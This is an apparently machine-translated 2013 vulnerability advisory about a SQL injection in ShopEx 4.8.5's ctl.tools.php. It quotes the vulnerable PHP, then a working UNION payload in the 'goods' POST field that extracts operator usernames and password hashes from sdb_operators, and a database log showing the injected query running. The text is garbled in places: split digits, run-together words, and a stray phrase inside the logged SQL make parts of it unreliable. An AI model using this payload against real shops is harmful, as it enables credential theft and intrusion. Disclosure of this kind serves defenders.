shopex ctl. tools. php file SQL injection vulnerability-vulnerability warning-the black bar safety net

2013-08-19T00:00:00
ID MYHACK58:62201340195
Type myhack58
Reporter code_sec
Modified 2013-08-19T00:00:00

Description

Issql injection

Test version: shopex-singel-4.8.5.78660

文件 \core\shop\controller\ctl.tools.php

function products(){ $objGoods = &$this->system->loadModel('goods/products');

$filter = array(); foreach(explode(',',$_POST['goods']) as $gid){ $filter['goods_id'][] = $gid; }

$this->pagedata['products'] = $objGoods->getList($objGoods->defaultCols.', find_in_set(goods_id,"'.$ _POST['goods'].'") as rank',$filter,0,-1,array('rank','asc'));

Visual$_POST['goods']directly into the sql statement, as part of the file encryption turned on sql statement execution record log

Submitted to:

goods=aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,1 0,1 1,1 2,1 3 from sdb_operators%2 3

1 3 0 5 2 6 2 0:0 3:2 3 3 5 2 Connect root@localhost on 3 5 2 Init DB shopex 3 5 2 Query SET NAMES 'utf8' 3 5 2 Query SELECT * FROM sdb_plugins WHERE plugin_type="app" 3 5 2 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1 3 5 2 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1 3 5 2 Query SELECT count(goods_id) FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods. disabled = 'false' AND sdb_goods. goods_type='normal' ORDER BY rank asc 3 5 2 Query SELECT bn,name,cat_id,price,store,an SEO and developer,brand_id,weight,d_order,uptime,type_id,supplier_id,find_in_set(goods_id,"aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,1 0,1 1,1 2,1 3 from sdb_operators#") as rank,goods_id,image_default,thumbnail_pic,brief,pdt_desc,mktprice,big_pic FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods. disabled = 'false' AND sdb_goods. goods_type='normal' ORDER BY rank asc LIMIT 0, 1 8 4 4 6 7 4 4 0 7 3 7 0 9 5 5 1 6 1 5

View the log of the variables already entered into the sql statement